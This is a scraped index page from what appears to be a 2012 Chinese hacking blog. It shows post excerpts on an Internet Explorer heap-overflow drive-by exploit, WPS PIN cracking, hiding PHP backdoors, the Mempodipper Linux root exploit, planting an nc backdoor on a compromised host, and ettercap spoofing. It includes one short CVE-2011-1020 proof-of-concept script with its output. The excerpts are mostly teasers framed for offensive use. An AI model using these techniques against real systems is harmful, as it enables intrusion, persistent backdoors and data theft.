ms12-004 :midiOutPlayNextPolyEvent Heap Overflow
2012年第一个网马 。。 目标系统: IE6 IE7 IE8 for WINDOWS XP3 ,CVE-2012-0003
Dis9 Team
The Underground Exploitation , Welcome Dis9Team
|
2012 年 1 月 27 日 ms12-004 :midiOutPlayNextPolyEvent Heap Overflow2012年第一个网马 。。 目标系统: IE6 IE7 IE8 for WINDOWS XP3 ,CVE-2012-0003 Scan WPS AP With Reaver感谢徒儿Ps7isy 投递 The procedure of breaking through the PIN authentication for WPS wireless routers is quite sufficiently documented and we are on this issue mentioned . It may be simple but the problem with the identification of wifi networks that have enabled WPS. Tested one by one is not very effective and time-consuming, and so it wants for this activity something automated. Below is a brief guide on how to make this painless. 2012 年 1 月 25 日 Tool of the week : unix-privesc-checkTool description as appears on the author website : Unix-privesc-checker is a script that runs on Unix systems ( teste on Solaris 9 ,HPUX 11 ,Various Linux es ,FreeBS D 6.2). It tries to find misconfigurations that could allow local unprivilged users to escalate privileges to other users or to access local apps (e.g. datebases ) . it is written as a single shell script so it can be easily uploaded and run (as opposed to un-tarred ,compiled and installed ). it can run either as a normal user or as root ( obviously it does a better job when running as root because it can read more files ). Get here : http://115.com/file/c2bhal4l 恩,搭建了一个DISCUZ程序Update:由于服务器续费受到压力(赞助商的鄙视),被迫关闭 好吧,这是一个专注LINUX安全的论坛,发这个帖子的目的,就是问问大家有兴趣嘛? 小站以后很少会更新
2012 年 1 月 24 日 PHP Stealth Backdoors如何隐藏你的PHP后门?前面BRK介绍了With Htaccess 和 The HookWorm 两个隐藏PHP后门的方式,同学们似乎很喜欢这个,看到很多留言 今天我再介绍3种隐藏PHP后门的方式,不过效果都没Brk炊少大黑客介绍的好(The HookWorm ) 如果你有号的方法,如果你想分享,请留言 CVE-2012-0056 – Mempodipper, a linux local root exploit.code : http://www.dis9.com/code/mempodipper-CVE-2012-0056.c.html //2.6.32-27-generic UBUNTU 测试代码有木有? CVE-2011-1020 #!/bin/bash (sleep 3; echo 15) > /proc/$$/oom_adj & exec /usr/bin/passwd 输出: Read 69 bytes: 7 0xffffffff 0xbff646ac 0x0 0x0 0xf4d 0xbff646c8 0xbff64654 0x64b422 Changing password for test. (current) UNIX password: Read 69 bytes: 3 0x0 0xbffb4a84 0x1ff 0x0 0xbffb4a84 0xbffb4d18 0xbffb4814 0xf30422 Read 69 bytes: 3 0x0 0xbffb4a84 0x1ff 0x0 0xbffb4a84 0xbffb4d18 0xbffb4814 0xf30422 2012 年 1 月 21 日 A Note on Updating Weaponized Nokia N900sI wanted to make this post to save time and headaches for people who own ‘weaponized’ Nokia N900s. If you regularly update your Nokia N900 by doing (as root): apt-get update && apt-get upgrade -y I have ran into some issues with some of the newer packages. Firstly, the newest beta version of nmap (5.59BETA1_armel) appears to be buggy enough to the point where it’s almost unusable. 2012 年 1 月 20 日 Add a backdoor via nc use BT5g0tmilk视频中的一点东西,跟大家分享一下,小菜文章,大牛勿喷! PS:在dis9.com发文章感到压力越来越大,阿弥陀佛,别喷我啊~ 本菜已经通过九区最新的ping溢出,获得了一台机器的系统权限,我们来安装NC,方便下次DIR溢出,嗯! 2012 年 1 月 19 日 Metasploit PSEXEC scanner (via Perl)这个模块和carlos_perez同学写的psexec_scanner.rb 差不多,你可以点这里查看 现在介绍这个PERL脚本也是扫描整段网络的 spl0it同学写的 强大的嗅探工具ettercap使用教程:我的欺骗规则ettercap是LINUX下一个强大的欺骗工具,当然WINDOWS也能用,你能够用飞一般的速度创建和发送伪造的包.让你发送从网络适配器到应用软件各种级别的包.绑定监听数据到一个本地端口:从一个客户端连接到这个端口并且能够为不知道的协议解码或者把数据插进去(只有在arp为基础模式里才能用) brk@Dis9Team:/usr/share/ettercap$ ls ettercap.png etterfilter.cnt etterfilter.tbl etter.mime etter.dns etter.filter.examples etter.finger.mac etter.services etter.fields etter.filter.kill etter.finger.os etter.ssl.crt etter.filter etter.filter.ssh etterlog.dtd brk@Dis9Team:/usr/share/ettercap$ |